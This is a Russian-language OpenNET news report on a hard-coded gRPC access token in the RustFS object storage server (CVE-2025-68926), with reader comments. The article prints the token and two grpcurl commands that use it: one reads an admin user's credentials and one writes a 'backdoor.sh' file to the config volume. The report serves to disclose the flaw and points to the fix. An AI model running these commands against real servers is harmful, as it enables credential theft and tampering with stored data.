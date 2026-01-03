The OpenNET Project / Index page

В RustFS выявлен предопределённый в коде токен доступа

03.01.2026 21:14

В проекте RustFS, развивающем совместимое с S3 распределённое объектное хранилище, написанное на языке Rust, выявлена уязвимость (CVE-2025-68926), напоминающая бэкдор. Проблема вызвана наличием жёстко прошитого в коде токена доступа, позволяющего подключиться к сетевому сервису по протоколу gRPC, указав в заголовке "authorization" значение "rustfs rpc". Токен присутствовал в коде сервера и клиента. Проблеме присвоен критический уровень опасности (9.8 из 10).

Атакующий, имеющий доступ к сетевому порту gRPC, мог использовать указанный токен для выполнения привилегированных операций с хранилищем, среди которых удаление данных, манипуляции с учётными данными пользователей и изменение настроек кластера. По умолчанию RustFS принимает gRPC-запросы на TCP-порту 9000 на всех сетевых интерфейсах. Уязвимость устранена в выпуске RustFS 1.0.0-alpha.77. 


   grpcurl -plaintext -H 'authorization: rustfs rpc' \
     -d '{"access_key": "admin"}' \
     localhost:9000 node_service.NodeService/LoadUser

   grpcurl -plaintext -H 'authorization: rustfs rpc' \
     -d '{"volume": "config", "path": "backdoor.sh", "buf": "..."}' \
     localhost:9000 node_service.NodeService/WriteAll


Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/64551-rustfs
Ключевые слова: rustfs, backdoor
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (29) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 21:21, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    "SAFE" код
     
     
  • 2.2, Аноним (2), 21:23, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +5 +/
    Вы не понимаете, это другое :-)
     

  • 1.3, Аноним (3), 21:28, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    > на языке Rust ... уязвимость ... напоминающая бэкдор

    Вот и первых ласточек отловили.

     
  • 1.4, Аноним (4), 21:29, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > уровень опасности (9.8 из 10)

    А 10 из 10 тогда што?

     
     
  • 2.7, Аноним (3), 21:35, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Затрудняюсь сказать... Но 9.8 - это удалённый доступ для выполнения привилегированных операций через продукт на расте.
     
  • 2.17, Аноним (17), 22:01, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Это для внутренних продуктов АНБ для служебного пользования.
     
  • 2.18, Аноним (18), 22:03, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    В данном случае после эксплуатации не меняется Scope. Если бы можно было, например, рута получить или из под гипервизора вырваться плюсом ко всему умеющемуся, то было бы 10 из 10.
     
  • 2.23, Аноним (23), 22:10, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Порт 9000 редко бывает наружу оттопырен
     
  • 2.30, Аноним (30), 22:34, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    10.0 - полный захват устройства в режиме Godmode, а не только "ограниченного в правах процесса".

    По факту встречается лишь в сетевом оборудовании, включая сетевые экраны.

    Кроме того, RCE бэкдоры intel ME имеют сильно заниженный рейтинг, как по делу, так и нет (есть открытые червеподобные бэкдоры, требующие активации опр. настроек на серверных платах; а есть просто RCE из коробки, требующее нахождения "инициатора" в одной LAN сети с жертвой - ~6 баллов.. закладки АНБ оч. любят размещать исключительно внутри lan, и оценивают на 2-3 балла ниже китайских аналогов)

     

  • 1.5, Аноним (5), 21:30, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    А почему не названы поименно прогроммизды на самом безопастном языке, добавившие в код этот бэкдор? Потому что это другое, да?
     
     
  • 2.6, Аноним (18), 21:34, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    https://github.com/rustfs/rustfs/pull/163

    Смотрите сами. Автор есть, вливший код тоже.

    Flow у них дурацкий - код вливают чере squash, трудно найти исходный коммит и PR, но не невозможно.

     
     
  • 3.8, Аноним (3), 21:36, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > трудно найти исходный коммит

    Т.е. виновных наказывать не будут?

     
     
  • 4.11, Аноним (18), 21:50, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Про трудно - это про свой опыт поиска в их репе. Будут наказывать или нет вопрос риторический.

    И, на самом деле, про PR выше я ошибся, в нём бэкдор перемещается в другой файл, а добавлен он был в https://github.com/rustfs/rustfs/commit/04ab9d75a97014d3056d4affcb0a0987c0d29a

     
  • 4.19, Аноним (19), 22:03, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Читайте внимательно лицензию. Продукт используете на свой страх и риск, сами продукты не пишете, ни копейки не заплатили, даже исходник не читали ... Свой продукт напишите и себе претензии предъявляйте.
     
     
  • 5.22, Аноним (22), 22:08, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Писульки в license.md не освобождают от уголовной ответственности, если это действительно окажется бэкдором.
     
     
  • 6.25, bircoph (ok), 22:21, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Доказать в суде умышленность бэкдора в данном случае невозможно: объяснение оставили возможность сервисного обслуживания прокатит. Тем более, никакой обфускации или сокрытия нет.
     
  • 6.26, Аноним (26), 22:24, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    В проприетари миллионы таких бэкдоров обнаруживаются, это совершенно нормально.
     
  • 3.10, Аноним (5), 21:41, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Понятно. То есть, кроме ников на гитхабе мы никакого расследования причин инцидента не увидим. Никакого там "работают на корпорацию такую-то, связанную со спецслужбами страны такой-то, те же авторы коммитили в такие-то проекты, сейчас проводится аудит, не набэкдорили ли они еще где-то...". Самый безопастный язык поругаем не бывает. О безопастном языке или хорошо, или помалкивать. Ясно.
     
  • 3.14, morphe (?), 21:58, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Впервые оно появилось тут, и это было без пулреквеста даже

    Тот пр что ты скинул лишь передвинул этот код в другое место

    Судя по всему это даже не бекдор, а сгенерированная условной ллмкой заглушка, потому что тут даже не так что этот токен допускается в дополнение к пользовательским, а является единственным способом авторизации, и вхардкожен в клиент и сервер

    https://github.com/rustfs/rustfs/commit/04ab9d75a97014d3056d4affcb0a0987c0d29a

     
  • 2.24, Аноним (-), 22:17, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    > junxiang Mu <1948535941@qq.com>

    Еще как палятся.

    > добавившие в код этот бэкдор?

    Разве это бекдор?
    "Какие ваши доказательства?" (с)

     

  • 1.9, Аноним (3), 21:38, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Это не бэкдор, это просто бомба!
     
  • 1.12, Аноним (12), 21:51, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    В коде на Си бекдоров не бывает. Запомните эту простую истину.
     
  • 1.13, Аноним (13), 21:56, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Полгода эта уязвимость была и никого она не смущала. Оно и не удивительно, учитывая, что Rust и без обфускации нечитаемый. Вопрос только один - это бэкдор или типичное RVE?
     
  • 1.15, Аноним (15), 22:00, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Когда ЯП настолько безопасный разрабам приходится внедрять бэкдоры сознательно.
     
  • 1.16, Аноним (16), 22:01, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    зачем фс слушать порт? опять распределённая хрень?
     
     
  • 2.29, Аноним (29), 22:33, 03/01/2026 [^] [^^] [^^^] [ответить]  
    		• +/
    Вопрос на засыпку: что такое S3?
     

  • 1.20, Аноним (20), 22:04, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    это не бэкдор, а обычная синхронизация с серверами анебе
     
  • 1.27, Аноним (27), 22:25, 03/01/2026 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Аххахах, нет, на бекдор это точно не похоже. Это похоже на полнейший идиотизм того, кто это писал.
     
  • 1.28, Аноним (28), 22:31, 03/01/2026 Скрыто ботом-модератором [﹢﹢﹢] [ · · · ]     [к модератору]
    		• +/
     

